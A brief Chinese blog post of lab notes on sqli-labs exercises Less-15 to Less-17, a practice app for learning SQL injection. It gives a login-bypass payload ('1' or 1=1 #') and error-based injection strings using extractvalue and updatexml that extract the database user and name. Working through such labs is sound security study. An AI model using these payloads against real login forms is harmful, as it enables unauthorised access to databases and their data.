sqlilab less15-17

less15

试了很多符号,页面根本不显示别的信息,猜测为盲注
可是怎么检测闭合?
万能密码登录
最终试出来’闭合
uname=1’ or 1=1 #
接下来就要工具跑
在这里插入图片描述

less16

同上用万能密码试闭合,工具/脚本跑
在这里插入图片描述

less-17

原理https://www.cnblogs.com/laoxiajiadeyun/p/10488731.html

insert基于报错的注入,updatexml(php>5.1),extractvalue
uname=Dumb&passwd=aaa' or extractvalue(1, concat(0x7c,(select user())));-- #&submit=Submit
在这里插入图片描述

uname=Dumb&passwd=aaa' or updatexml(123,concat('~',(select database())),123)-- #&submit=Submit
在这里插入图片描述

posted @ 2020-03-21 20:16  10nnn4R  阅读(257)  评论(0编辑  收藏  举报